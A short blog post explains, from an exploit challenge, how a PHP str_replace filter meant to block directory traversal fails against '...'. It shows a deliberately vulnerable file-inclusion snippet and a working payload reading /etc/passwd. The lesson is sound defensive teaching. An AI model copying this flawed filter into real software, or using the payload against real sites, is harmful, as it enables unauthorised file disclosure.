str_replace isn’t recursive
It's funny how some people couldn't bend their minds around this exploit challenge. Well, if you don't know how the function works, it's hard to see. But as the post title said already, str_replace() isn't recursive, so isn't very safe all the time.
When protecting from LFI, sometimes a programmer decides to try to block access to upper directories, by using:
function removeDouble($str)
{
return str_replace('..','.',$str);
}
Assuming there are only two dots in $str, this would work, but the moment you enter "...", and pass it through the string, you get: .., which is excellent for reaching higher directories from the PHP script.
Example:
<?php
function removeDouble($str)
{
return str_replace('..','.',$str);
}
if(file_exists('./'.removeDouble($_GET['page'])))
{
include('./'.removeDouble($_GET['page']));
}
?>
Exploit: index.php?page=.../.../etc/passwd
I succeeded in this part of the exploit challenge with my bad programming/hacking skills by using a bit of logical thinking ;-)